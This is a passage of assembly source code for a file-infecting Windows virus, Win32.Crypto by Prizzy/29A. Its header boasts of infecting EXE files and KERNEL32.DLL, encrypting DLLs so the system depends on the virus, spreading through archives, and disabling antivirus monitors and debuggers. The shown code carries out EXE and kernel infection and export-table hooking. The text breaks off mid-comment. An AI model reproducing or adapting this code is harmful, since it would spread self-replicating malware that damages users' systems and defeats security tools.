;
;  ÚÄÄÍÍÍÍÍÍÍÍÄÄÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ÄÄÍÍÍÍÍÍÍÍÄÄ¿
;  : Prizzy/29A :		 Win32.Crypto		      : Prizzy/29A :
;  ÀÄÄÍÍÍÍÍÍÍÍÄÄÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙÄÄÍÍÍÍÍÍÍÍÄÄÙ
;
;   I'm very proud on my very first virus at Win32 platform. It infects EXE
;   files with PE (Portable Executable) header. Also it can compress itself
;   into ZIP/ARJ/RAR/ACE/CAB archivez. If the virus catch DLL opeations, it
;   encrypt/decrypt that by cryptography functions. Thus, we can  pronounce
;   the system is dependents on the virus (OneHalf idea).
;
;   When infected EXE is started, it infects KERNEL32.DLL, hooks some Win32
;   functions and next reboot is actived. It catches "all" file operations,
;   create thread/mutex, run Hyper Infection  for API to find  archivez, AV
;   checksum files, EXEs and so on.
;
;   If PHI-API will find an archive program, the virus compress itself	and
;   add itself to body (inside, not at the end). My PPE-II does NOT support
;   copro & mmx garbages, only based with many features are new.
;
;
;			     Detailed Information
;			    ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;
;
;   Cryptography Area, based on WinAPI (SR2/NT) functions
;   ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;   Let us start. I exploited One Half technics for Win32 world, new method
;   in our VX world. You exactly know One Half tries to encode your sectors
;   and if you want to read its he decodes ones and so on, you exactly know
;   what I think. Well, and because I use kernel32 infection I can hook all
;   file functions. Then I decode all DLL files by PHI-II (Hyper Infection)
;   and if the system wants to open DLL file I decode one, and so on. Then,
;   the Win32 system is dependents on my virus. Naturally, the user can re-
;   install Win95/98/NT/2000 but then DLL are in MSOffice, Visual C++, ICQ,
;   Outlook, AutoCAD and many many more appz. For comparison:  my Win98 has
;   831 DLL files and on my all disks are 5103 DLL files (including Win2k).
;   I know this is the perfect way to get all what you want. But I've found
;   out I can't hook all Win32 file operations so, true crypto DLL  will be
;   inside Ring0/Ring3 world - my future work...
;
;
;   Prizzy Polymorphic Engine (PPE-II new version)
;   ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;   I've removed all copro & mmx garbages and I've coded these new stuff:
;	* brute-attack algorithm
;	* random multi-layer engine
;   By "brute-attack" I'm finding right code value by checksum. And because
;   I don't know that number, AV neither. This process can take mostly 0.82
;   seconds on my P233. For more info find "ppe_brute_init:" in this source
;
;   In the second case I don't decode by default (up to down) but by random
;   multi-layer algorithm. It means  I generate the certain  buffer and  by
;   its I decode up or down. Thus I can generate more  then 950  layers and
;   typical some 69 layers. Also the  random buffer, behind  poly loop, has
;   anti-heuristic protection (gaps) to AV couldn't simulate  that process.
;   So, only in my decoding loop are  stored the places where the gaps are.
;   Find "ppe_mlayer_generate:" label for many momre information.
;
;
;   Infection ZIP/ARJ/RAR/ACE/CAB archivez, including RAR/ACE EXE-SFX
;   ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;   I will find these archive programs and by them I will compress some in-
;   fected file by random compression level. Then the dropper is stored in-
;   side archive, not at the end. So, I don't need have any CRC algorithms.
;   However these operations are very complex, especially ZIP infection but
;   it isn't impossible. So, AV cannot check only last file (stored) in ar-
;   chive, but inside it.
;
;
;				 Main features
;				ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;
;
;   * Platforms:      Windows 95/98, Windows NT/2000 (tested on 2031 build)
;   * Residency:      Yes, KERNEL32 way, working on 95/98 and NT/2k systems
;   * Non-residency:  Yes, only K32 infection
;   * Stealth:	      Yes, DLLs working; opening, copying and loading
;   * AntiDebugging:  Yes, some stupid debuggers like TD32; routinues for
;		      disable SoftICE 95/NT.
;   * AntiHeuristic:  Yes, threads way and multi-layer anti-heuristic
;   * AntiAntivirus:  Yes, deleting checksum files, hacking AVAST database
;   * Other anti-*:   Yes, anti-emulator, anti-bait, anti-monitor
;   * Fast Infection: Yes/No, infect only 20 EXEs every reboot, but infect
;		      all types of archivez on all diskz
;   * Polymomrphism:  Yes, using based garbages from Win9x.Prizzy, inclu-
;		      ding brute-force way and random multi-layer way
;   * Other features: (a) Use of brute-CRC64 algorithm to find APIs in K32
;		      (b) Encoding and decoding DLLs in real time
;		      (c) Memory allocations by "CreateFileMapping" func.
;			  'cause of sharing among processes
;		      (d) Use of threads, mutexes & process tricks
;		      (e) Support of "do not infected" table
;		      (f) Checking files by natural logarithm
;		      (g) No optimalization, yeah, I don't lie (read
;			  "Words from Prizzy" 29A #4 to know why)
;		      (h) UniCode support
;
;
;				   Greetings
;				  ÄÄÄÄÄÄÄÄÄÄÄ
;
;   And finally my greetz go to:
;   ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;     Darkman	     u're really great inet pal, thanx for fun on #virus :)
;     Benny	     thanx for big help with threads, mutexes... we're wait-
;		     ing for Darkman's trip here, aren't we :) ?
;     GriYo	     nah, I'd like to understand your ideas... thanx :) !
;     Flush	     u've really big anti-* ideas, dude
;     MemoryLapse    yeah, K32 infection... go out of efnet to undernet
;     LordJulus      you have great vx articles, viruses ...
;     Asmodeus	     finish that virus and release it; thanx for your trust
;     AV companies   just where is my win9x.prizzy description :) ?
;     ...and for VirusBuster and Bumblebee
;
;
;   Contact me
;   ÄÄÄÄÄÄÄÄÄÄ
;     prizzy@coderz.net
;     http://prizzy.cjb.net
;
;
;   (c)oded by Prizzy/29A, December 1999
;
;

		.386p
		.model	flat,STDCALL

		include Include\Win32API.inc
		include Include\UseFul.inc
		include Include\MZ.inc
		include Include\PE.inc

		extrn	ExitProcess:proc
		extrn	MessageBoxA:proc

;ÄÄÄ´ prepare to program start ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

.data
		db	?
.code

;ÄÄÄ´ some equ's needed by virus ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

;DEBUG		 equ	 YEZ			 ;only for debug and 1st start

mem_size	equ	(mem_end -virus_start)	;size of virus in memory
file_size	equ	(file_end-virus_start)	;size of virus in file

infect_minsize	equ	4096			;only filez bigger then 4K
infect_maxsize	equ	100*1024*1024		;to 100Mb

access_ebx	equ	(dword ptr 16)		;access into stack when
access_edx	equ	(dword ptr 20)		;will be used pushad
access_ecx	equ	(dword ptr 24)
access_eax	equ	(dword ptr 28)

search_mem_size equ	100*(size dta+size search_address)

;ÄÄÄ´ some structurez for virus ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

dta_struc		struc			;Win32_FIND_DATA structure
dta_fileattr		dd	?		;for FindFirstFile function
dta_time_creation	dq	?
dta_time_lastaccess	dq	?
dta_time_lastwrite	dq	?
dta_filesize_hi 	dd	?
dta_filesize		dd	?
dta_reserved_0		dd	?
dta_reserved_1		dd	?
dta_filename		db	260 dup (?)
dta_filename_short	db	14 dup (?)
			ends

sysTime_struc		struc			;used by my Windows API
wYear			dw	0000h		;"hyper infection"
wMonth			dw	0000h
wDayOfWeek		dw	0000h
wDay			dw	0000h
wHour			dw	0000h
wMinute 		dw	0000h
wSecond 		dw	0000h
wMilliseconds		dw	0000h
			ends

Process_Information	struc			;CreateProcess: struc #1
hProcess		dd	00000000h
hThread 		dd	00000000h
dwProcessId		dd	00000000h
dwThreadId		dd	00000000h
			ends

Startup_Info		struc			;CreateProcess: struc #2
cb			dd	00000000h
lpReserved		dd	00000000h	;this struc has been stolen
lpDesktop		dd	00000000h	;from "Win32 Help"
lpTitle 		dd	00000000h
dwX			dd	00000000h
dwY			dd	00000000h
dwXSize 		dd	00000000h
dwYSize 		dd	00000000h
dwXCountChars		dd	00000000h
dwYCountChars		dd	00000000h
dwFillAttribute 	dd	00000000h
dwFlags 		dd	00000000h
wShowWindow		dw	0000h
cbReserved2		dw	0000h
lpReserved2		dd	00000000h
hStdInput		dd	00000000h
hStdOutput		dd	00000000h
hStdError		dd	00000000h
			ends

File_Time		struc			;get/set file time struc
dwLowDateTime		dd	00000000h
dwHighDateTime		dd	00000000h
			ends

;ÄÄÄ´ some macroz needed by virus ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		; search "anti-emulators:" for more information

@ANTI_E_START		macro	start_hack, finish_hack
			WHILE	(num NE 0)
			  push	dword ptr [ebp+start_hack + \
				((finish_hack-start_hack) / 4 + 1 - num) * 4]
			  num = num - 1
			endm
		num = (finish_hack - start_hack) / 4 + 1
			endm

@ANTI_E_FINISH		macro	start_hack, finish_hack, thread_handle
			WHILE	(num NE 0)
			  pop	dword ptr [ebp+finish_hack - \
				(finish_hack-start_hack) mod 4 - \
				((finish_hack-start_hack) / 4 + 1 - num) * 4]
			  num = num - 1
			endm
			call	[ebp+ddCloseHandle], thread_handle
		num = (finish_hack - start_hack) / 4 + 1
			endm

;ÄÄÄ´ virus code starts here ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
virus_start:

		call	get_base_ebp		;get actual address to EBP

		mov	eax,ebp
		db	2Dh			;sub eax,infected_ep
infected_ep:	dd	00001000h
		db	05h			;add eax,original_ep
original_ep:	dd	00000000
		sub	eax,[ebp+__pllg_lsize]
		push	eax			;host address

		; use anti-emulator
		pusha
		@SEH_SetupFrame <jmp __anti_e_1>;set SEH handler
		call	$			;ehm :)
		jmp	__return
	__anti_e_1:
		@SEH_RemoveFrame		;reset SEH handler
		popa

		call	find_kernel32		;find kernel's base address

		; use anti-emulator
		@ANTI_E_START __thread_1_begin, __thread_1_finish
		lea	eax,[ebp+__thread_1]	;thread function
		mov	ebx,offset __thread_1_begin + \
			    (__thread_1_finish - __thread_1_begin) \
			    shl 18h		;upper imm8 register in EBX
		call	__MyCreateThread	; * anti-heuristic
	__thread_1_begin	equ this byte
		jmp	$			;anti-emulator :)
		jmp	__return		;patch this ! random number
	__thread_1_finish	equ this byte
		@ANTI_E_FINISH __thread_1_begin, __thread_1_finish, eax

		; next code...
		call	kill_av_monitors	;kill AVP, AVAST32 etc.
		call	kill_debuggers		;bye, bye SoftICE, my honey
		call	create_mutex		;already resident ?
		jc	__return		;go back, if yes
		call	crypto_startup
		call	infect_kernel		;ehm, find kernel and infect!

__return:
		pop    eax
		add    eax,offset virus_start
		jmp    eax			;go back, my lord...

;ÄÄÄ´ main function for infect file ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This is main function which infects file.
		;
		;Extension support:
		;    EXE ... executable file (PE), RAR/ACE SFX file
		;    DLL ... kernel32 infection, encypting through PHI-API
		;    CAB ... infecting Microsoft Cabinet File
		;    ZIP/ARJ/RAR/ACE ... dropper compressed,inside archive
		;
		;Okay, here is truth. I had many problems with EXE and DLL
		;infection in this function. I found  out  all valuez have
		;to be aligned etc. Especially Win2k need that. I also use
		;"CheckSumMappedFile" function to calculate appz checksum.
		;
infect_file:

		; save registers & get delta
		pusha
		call	get_base_ebp

		; get extension
		mov	edi,[ebp+filename_ptr]

		; convert lowercase characters to uppercase
		push	edi
		call	[ebp+ddlstrlen] 	;get length of filename
		inc	eax			;number of characters to
		push	eax			;progress
		push	edi			;filename
		call	[ebp+ddCharUpperBuffA]	;convert to uppercase

		; infect only files in these dirz
	IFDEF DEBUG
		cmp	[edi+00000000h],'W\:C'	;"C:\WIN\WEWB4\XX\"
		jnz	__if_debug		;directory
		cmp	[edi+00000004h],'W\NI'
		jnz	__if_debug
		cmp	[edi+00000008h],'4BWE'
		jnz	__if_debug
		cmp	[edi+0000000Ch],'\XX\'
		jz	__if_debug2
	    __if_debug:
		cmp	[edi],'W\:C'		;"C:\WINDOWS\KERN"
		jnz	infect_file_exit
		cmp	[edi+4],'ODNI'
		jnz	infect_file_exit
		cmp	[edi+8],'K\SW'
		jnz	infect_file_exit
		cmp	[edi+8+4],'ENRE'
		jnz	infect_file_exit
	    __if_debug2:
	ENDIF

		; check file name (by avoid table)
		mov	ebx,[ebp+filename_ptr]	;filename
		lea	esi,[ebp+avoid_table]	;avoid table
		call	validate_name
		jc	infect_file_exit

		; check AV files (anti-bait)
		call	fuck_av_files
		jc	infect_file_exit

		; get extension
		cld
		mov	al,'.'			;search this char
		mov	cx,filename_size	;max filename_size
		repnz	scasb			;searching...
		dec	edi			;set to that char
		cmp	al,[edi]		;check again !
		jnz	infect_file_exit	;shit, bad last char

	IFDEF DEBUG
		mov	eax,[edi-4]		;you can infect only
		cmp	eax,'23LE'
		jz	__OnlyMyKernel
		cmp	eax,'DCBA'		;this file on my disk
		jnz	infect_file_exit	;i won't risk
	    __OnlyMyKernel:
	ENDIF
		; get file information
		lea	esi,[ebp+dta]		;dta structure
		mov	edx,[ebp+filename_ptr]	;FileName pointer
		call	__MyFindFirst
		jc	infect_file_exit	;success ?
		call	__MyFindClose		;close handle

		cmp	dword ptr [ebp+it_is_kernel],00000001h
		jz	infect_file_continue	;if kernel32, infect it

		; check extension
		mov	eax,[edi]		;get ext of file
		not	eax
		cmp	eax,not 'EXE.'		;is it EXE file ?
		jnz	next_ext_1
		call	infect_ACE_RAR		;is it ACE/RAR EXE-SFX file ?
		jnc	infect_file_exit
		jmp	next_ext_end
	next_ext_1:
		cmp	eax,not 'ECA.'		;is it ACE archive file ?
		jnz	next_ext_2
		call	infect_ACE
	next_ext_2:
		cmp	eax,not 'RAR.'		;is it RAR archive file ?
		jnz	next_ext_3
		call	infect_RAR
	next_ext_3:
		cmp	eax,not 'JRA.'		;is it ARJ archive file ?
		jnz	next_ext_4
		call	infect_ARJ
	next_ext_4:
		cmp	eax,not 'PIZ.'		;is it ZIP archive file ?
		jnz	next_ext_5
		call	infect_ZIP
	next_ext_5:
		cmp	eax,not 'BAC.'		;is it CAB archive file ?
		jnz	infect_file_exit
		call	infect_CAB
		jmp	infect_file_exit
	next_ext_end:				;infect if any EXE file

		; check number of infected files
		cmp	[ebp+NewACE.dropper],00000000h
		jz	infect_file_continue	;dropper exists ?
		cmp	dword ptr [ebp+file_infected],20
		jae	infect_file_exit	;infected more then 20 EXEs ?

		; check file size
	infect_file_continue:
		mov	eax,[ebp+dta.dta_filesize]
		cmp	eax,infect_minsize	;is filesize smaller ?
		jb	infect_file_exit
		cmp	eax,infect_maxsize	;is filesize bigger ?
		ja	infect_file_exit

		; set file attributes
		mov	ecx,FILE_ATTRIBUTE_NORMAL
		mov	edx,[ebp+filename_ptr]
		call	__MySetAttrFile
		jc	infect_file_exit	;success ?

		; open file
		mov	edx,[ebp+filename_ptr]
		call	__MyOpenFile		;open file !
		jc	infect_file_restattr
		mov	[ebp+file_handle],eax

		; create a memory map object
		push	00000000h		;name of file mapping object
		push	00000000h		;low 32 bits of object size
		push	00000000h		;high 32 bits of object size
		push	PAGE_READONLY		;get needed valuez, etc.
		push	00000000h		;optional security attributes
		push	[ebp+file_handle]	;handle to file to map
		call	[ebp+ddCreateFileMappingA]
		or	eax,eax 		;failed ?
		jz	infect_file_close
		mov	[ebp+file_hmap],eax	;store mapped file handle

		; view of file in our address
		push	00000000h		;number of bytes to map
		push	00000000h		;low 32 bits of the offset
		push	00000000h		;high 32 bits of the offset
		push	FILE_MAP_READ		;access mode
		push	[ebp+file_hmap] 	;mapped file handle
		call	[ebp+ddMapViewOfFile]
		or	eax,eax 		;failed ?
		jz	infect_file_closeMap
		mov	[ebp+file_hmem],eax	;mapped file in memory

		; check file signature
		cmp	word ptr [eax.MZ_magic], \
			IMAGE_DOS_SIGNATURE	;test 'MZ'
		jnz	infect_file_unMap

		; check "PE" valuez
		cmp	word ptr [eax.MZ_crlc],0000h
		jz	infect_file_okay	;no PE ?
		cmp	word ptr [eax.MZ_lfarlc],0040h
		jb	infect_file_unMap	;bad PE ?

	infect_file_okay:
		; seek on NT header
		mov	esi,eax
		add	esi,[eax.MZ_lfanew]
		push	esi
		call	[ebp+ddIsBadCodePtr]	;can we read memory at least?
		or	eax,eax
		jnz	infect_file_unMap

		; check "PE" signature
		cmp	dword ptr [esi.NT_Signature], \
			IMAGE_NT_SIGNATURE
		jnz	infect_file_unMap	;is it really 'PE\0\0' ?

		; already infected ?
		mov	eax,[ebp+file_hmem]	;mapped file in memory
		add	eax,[ebp+dta.dta_filesize]
		mov	eax,[eax-00000004h]	;infected dword flag
		call	__check_infected
		jnc	infect_file_unMap

		; check header flags
		mov	ax,[esi+NT_FileHeader.FH_Characteristics]
		test	ax,IMAGE_FILE_EXECUTABLE_IMAGE
		jz	infect_file_unMap
		test	ax,IMAGE_FILE_DLL	;no DLL ?
		jz	infect_file_no_dll
		cmp	dword ptr [ebp+it_is_kernel],00000000h
		jz	infect_file_unMap	;is it kernel32 infection ?

	infect_file_no_dll:
		call	__getLastObjectTable	;seek on last object table

		; alloc memory for polymorphic engine
		mov	eax,file_size + 30000h
		call	malloc
		mov	[ebp+mem_address],eax
		add	eax,file_size
		mov	[ebp+poly_start],eax

		; get new entry-point (EXE), or change IT of kernel32 ?
		mov	eax,[ebx+SH_SizeOfRawData]
		add	eax,[ebx+SH_VirtualAddress]
		mov	dword ptr [ebp+infected_ep],eax
		mov	eax,[esi+NT_OptionalHeader.OH_AddressOfEntryPoint]
		mov	dword ptr [ebp+original_ep],eax

		mov	[ebp+poly_finish],mem_size

		; run Prizzy Polymorphic Engine (PPE-II)
		cmp	dword ptr [ebp+it_is_kernel],00000000h
		jnz	infect_file_common

		call	ppe_startup

		; calculate maximum infected file size
	infect_file_common:
		mov	eax,[ebx+SH_SizeOfRawData]	;file size
		add	eax,[ebx+SH_PointerToRawData]
		add	eax,[ebp+poly_finish]		; + virus file size
		add	eax,00000004h			; + infected flag
		mov	ecx,[esi+NT_OptionalHeader.OH_FileAlignment]
		xor	edx,edx
		add	eax,ecx
		dec	eax
		div	ecx
		mul	ecx
		push	eax

		; unmap file object
		push	[ebp+file_hmem]
		call	[ebp+ddUnmapViewOfFile]

		; close mapping file object
		push	[ebp+file_hmap]
		call	[ebp+ddCloseHandle]

		; reopen memory mapped file object
		push	00000000h		;name of file mapping object
		push	dword ptr [esp+0000004h];low 32 bits of object size
		push	00000000h		;high 32 bits of object size
		push	PAGE_READWRITE		;get needed valuez, etc.
		push	00000000h		;optional security attributes
		push	[ebp+file_handle]	;handle to file to map
		call	[ebp+ddCreateFileMappingA]
		mov	[ebp+file_hmap],eax	;store mapped file handle

		; view of file in our memory
		push	00000000h		;number of bytes to map
		push	00000000h		;low 32 bits of the offset
		push	00000000h		;high 32 bits of the offset
		push	FILE_MAP_WRITE		;access mode
		push	[ebp+file_hmap] 	;mapped file handle
		call	[ebp+ddMapViewOfFile]
		mov	[ebp+file_hmem],eax	;mapped file in memory

		; seek on last object table
		add	eax,[eax.MZ_lfanew]
		mov	esi,eax
		call	__getLastObjectTable

		; infect "KERNEL32" file OR change EntryPoint
		cmp	dword ptr [ebp+it_is_kernel],00000000h
		jz	infect_file_entry
		mov	[ebp+__pllg_lsize],00000000h ;more info in that func
		call	infect_file_kernel	;hook "kernel32" table :)
		jmp	infect_file_no_change
	infect_file_entry:
		mov	eax,dword ptr [ebp+infected_ep]
		add	eax,[ebp+file_size3]
		mov	[esi+NT_OptionalHeader.OH_AddressOfEntryPoint],eax

		; copy mem_address (virus body) to the end of file
	infect_file_no_change:
		push	esi
		mov	esi,[ebp+mem_address]	;source data
		mov	edi,[ebx+SH_SizeOfRawData]
		add	edi,[ebx+SH_PointerToRawData]
		add	edi,[ebp+file_hmem]	;destination pointer
		mov	ecx,[ebp+poly_finish]	;number of bytes to copy
		rep	movsb
		pop	esi

		; calculate new physical size
		mov	eax,[ebp+poly_finish]
		cmp	dword ptr [ebp+it_is_kernel],00000000h
		jz	$ + 7			;this isn't logic but i had
		mov	eax,mem_size		;problems in k32 memory
		add	eax,[ebx+SH_SizeOfRawData]
		mov	ecx,[esi+NT_OptionalHeader.OH_FileAlignment]
		xor	edx,edx
		add	eax,ecx
		dec	eax
		div	ecx
		mul	ecx
		mov	[ebx+SH_SizeOfRawData],eax

		; calculate new potential virtual size
		mov	eax,[ebx+SH_VirtualSize]
		add	eax,mem_size
		mov	ecx,[esi+NT_OptionalHeader.OH_SectionAlignment]
		xor	edx,edx
		add	eax,ecx
		dec	eax
		div	ecx
		mul	ecx

		; if new phys_size > virt_size	==>  virt_size = phys_size
		cmp	eax,[ebx+SH_SizeOfRawData]
		jnc	infect_file_no_update
		mov	eax,[ebx+SH_SizeOfRawData]
	infect_file_no_update:
		mov	[ebx+SH_VirtualSize],eax

		add	eax,[ebx+SH_VirtualAddress]

		; infected host increased an image size ?
		cmp	eax,[esi+NT_OptionalHeader.OH_SizeOfImage]
		jc	infect_no_update_2
		mov	[esi+NT_OptionalHeader.OH_SizeOfImage],eax
	infect_no_update_2:

		; set these PE flags
		or	dword ptr [ebx+SH_Characteristics], \
			IMAGE_SCN_CNT_CODE or IMAGE_SCN_MEM_EXECUTE or \
			IMAGE_SCN_MEM_WRITE

		; already infected flag
		mov	eax,02302301h		;special number
		call	ppe_get_rnd_range
		inc	eax			;it can't be zero
		imul	eax,117 		;encrypt one
		pop	edi			;file size + virus size
		mov	[ebp+file_hsize],edi
		add	edi,[ebp+file_hmem]	;mapped file in memory
		mov	[edi-00000004h],eax	;already infected flag

		; calculate new checksum because of Win2k and WinNT :)
		cmp	dword ptr [esi+NT_OptionalHeader. \
				       OH_CheckSum],00000000h
		jz	infect_file_no_checksum
		@pushsz "IMAGEHLP.DLL"		;load "IMAGEHLP.DLL" library
		call	[ebp+ddLoadLibraryA]
		or	eax,eax 		;failed ?
		jz	infect_file_no_checksum
		push	eax			;parameter for FreeLibrary

		; get function to calculate checksum
		@pushsz "CheckSumMappedFile"	;get address of this function
		push	eax			;library handle
		call	[ebp+ddGetProcAddress]
		or	eax,eax
		jz	infect_file_deload

		; calculate checksum
		lea	ecx,[esi+NT_OptionalHeader.OH_CheckSum]
		push	ecx			;receives computed checksum
		call	$+9			;header old checksum
		dd	?
		push	dword ptr [ebp+file_hsize]
		push	[ebp+file_hmem] 	;memory mapped address
		call	eax

	infect_file_deload:
		call	[ebp+ddFreeLibrary]

		; dealloc memory for PPE-II
	infect_file_no_checksum:
		mov	eax,[ebp+mem_address]
		call	mdealloc

		; new infected file
		inc	dword ptr [ebp+file_infected]

		; use for acrhive dropper ?
		cmp	dword ptr [ebp+dta.dta_filesize],30000
		ja	infect_file_unMap	;for archive fsize < 30Kb
		push	[ebp+file_hmem] 	;mapped file in memory
		call	[ebp+ddUnmapViewOfFile]
		push	[ebp+file_hmap] 	;mapped file object
		call	[ebp+ddCloseHandle]
		mov	ebx,[ebp+file_handle]	;I must close infected file
		call	__MyCloseFile		;coz I'll copy it, etcetera
		call	__add_dropper		;compress it by ZIP, RAR ...
		jmp	infect_file_restattr

	infect_file_unMap:
		push	[ebp+file_hmem] 	;mapped file in memory
		call	[ebp+ddUnmapViewOfFile]
	infect_file_closeMap:
		push	[ebp+file_hmap] 	;mapped file object
		call	[ebp+ddCloseHandle]
	infect_file_time:
		lea	eax,[ebp+dta.dta_time_lastwrite]
		lea	ecx,[ebp+dta.dta_time_lastaccess]
		lea	edx,[ebp+dta.dta_time_creation]
		call	[ebp+ddSetFileTime], \
			[ebp+file_handle], \
			edx, ecx, eax
	infect_file_close:
		mov	ebx,[ebp+file_handle]	;close file handle
		call	__MyCloseFile
	infect_file_restattr:
		mov	ecx,[ebp+dta.dta_fileattr]
		mov	edx,[ebp+filename_ptr]	;restore file attributes
		call	__MySetAttrFile

	infect_file_exit:
		popa				;go to HyperInfection or to
		ret				;Kernel32 hooked functions

		;---------------------------------------------------------
		;Common file infected semi-functions.
		;
	__getLastObjectTable:
		movzx	eax,[esi+NT_FileHeader.FH_NumberOfSections]
		cdq
		mov	ecx,IMAGE_SIZEOF_SECTION_HEADER
		dec	eax
		mul	ecx			;eax=offs of last section

		movzx	edx,[esi+NT_FileHeader.FH_SizeOfOptionalHeader]
		add	eax,edx
		add	eax,esi
		add	eax,offset NT_OptionalHeader.OH_Magic ;seek to l.o. table

		xchg	eax,ebx
		ret

;ÄÄÄ´ function to hook some funtions from KERNEL32.DLL ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;At last I've finished this unpalatable function. I remem-
		;ber how hardly I have	found an  interesting source about
		;this method because I have many many  problems with this.
		;So, let's begin. At first I will get these addresses:
		;   * name table pointer (as are function names)
		;   * address table pointer (as are functions addresses)
		;   * ordinal table pointer
		;Then I'll get function name, calculate its CRC32 and I'll
		;compare it  with my future-hooked CRC32  table. If I will
		;find it, i will save its original address,  replace by my
		;my new offset and I'll write it to the file.
		;
		;I would like to thank:
		;   * "Memory Lapse" for his "Win32.Heretic" source
		;   * Darkman/29A for giving me that source
		;
		;I must infect "kernel32.dll" because I must hook all disk
		;functions because of "Prizzy Hyper Infection for API".
		;
infect_file_kernel:

		; save all registers
		pusha

		; check address of APIs in KERNEL32 file body
		mov	eax,[ebp+file_hmem]
		add	eax,[eax.MZ_lfanew]	;go to new "PE" header

		mov	eax,dword ptr [eax.OH_DirectoryEntries + \
			    IMAGE_SIZEOF_FILE_HEADER + \
			    00000004h]		;get Export Directory Table
		add	eax,[ebp+file_hmem]

		mov	ebx,[eax.ED_AddressOfOrdinals]
		mov	esi,[eax.ED_AddressOfNames]
		mov	edx,[eax.ED_AddressOfFunctions]
		push	[eax.ED_BaseOrdinal]	;save BaseOrdinal
		add	eax,[eax.ED_BaseOrdinal]

		add	ebx,[ebp+file_hmem]	;adjust ordinal table pointer
		add	esi,[ebp+file_hmem]	;adjust name table pointer
		add	edx,[ebp+file_hmem]	;adjust address table pointer
		push	edx esi ebx		;save startup values

		; main loop
		lea	edi,[ebp+Hooked_API]
		mov	ecx,00000001h
	__ifk_next_loop:
		push	edx			;address table pointer
		push	ecx			;save counter
		shl	ecx,01h 		;convert to word index

		movzx	eax,word ptr [ebx+ecx]	;calculate ordinal index
		sub	eax,[esp+00000014h]	;relative to ordinal basee
		shl	eax,02h 		;convert to dword index

		mov	edx,eax
		mov	ecx,[esp+00000010h]	;address pointer table

		add	eax,ecx 		;calculate offset
		lea	ecx,[ecx+edx]		;RVA of API

		push	esi			;address name table
		mov	esi,[esi]		;get pointer from name table
		add	esi,[ebp+file_hmem]
		call	__get_CRC32		;get CRC32 for function name
		cmp	eax,[edi]		;compare CRC32
		pop	esi
		jnz	__ifk_not_found

		push	edi			;load original function addr
		lea	eax,[ebp+Hooked_API]
		sub	edi,eax
		shl	edi,01h 		;so, (x/2)*8
		lea	eax,[ebp+Hooked_API_functions]
		add	edi,eax
		mov	eax,[edi]		;get address into "jmp ????"
		add	eax,ebp 		;ehm, adjust that address
		mov	ebx,[ecx]		;load original address
		add	ebx,[ebp+kernel_base]
		mov	[eax],ebx		;save original func. address
		mov	eax,[edi+00000004h]	;load new address in v.body
		pop	edi
		add	edi,00000004h		;next CRC32 function value

		sub	eax,offset virus_start	; - "offset"
		add	eax,[ebp+dta.dta_filesize] ;new func. pos in "k32"
		mov	[ecx],eax

		; for next loop I must restart these values
		mov	ebx,[esp+00000008h]	;load ordinal table pointer
		mov	esi,[esp+0000000Ch]	;load name table pointer
		mov	edx,[esp+00000010h]	;load address table pointer
		mov	dword ptr [esp],00000000h ;reset counter
		mov	[esp+00000004h],edx	;reset address table pointer
		jmp	__ifk_no_change 	;this was fucking bug !

	__ifk_not_found:
		add	esi,00000004h		;next name pointer
		add	dword ptr [esp + \	;next function pointer
			00000004h],00000004h
	__ifk_no_change:
		pop	ecx			;functions counter
		inc	ecx			;next function
		pop	edx			;address table pointer
		cmp	dword ptr [edi],00000000h ;end of hooked functions ?
		jnz	__ifk_next_loop

		mov	dword ptr [ebp+it_is_kernel],00000000h
		mov	dword ptr [ebp+HyperInfection_k32],00000000h

		; write this virus body to the end of "kernel32.dll"
		; virus body cannot be encrypted...
		lea	esi,[ebp+virus_start]	;start of virus body
		mov	edi,[ebp+mem_address]	;allocated memory
		mov	ecx,mem_size
		rep	movsb

		mov	dword ptr [ebp+it_is_kernel],00000001h
		mov	eax,mem_size		;without poly-engine !!!
		mov	[ebp+poly_finish],eax

		add	esp,4*4
		popa
		ret				;complex way how to go back

;ÄÄÄ´ main function of infect all filez on disks ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function searchs these extensions on all disks:
		;	EXE, ZIP, ARJ, RAR, ACE, CAB, ...
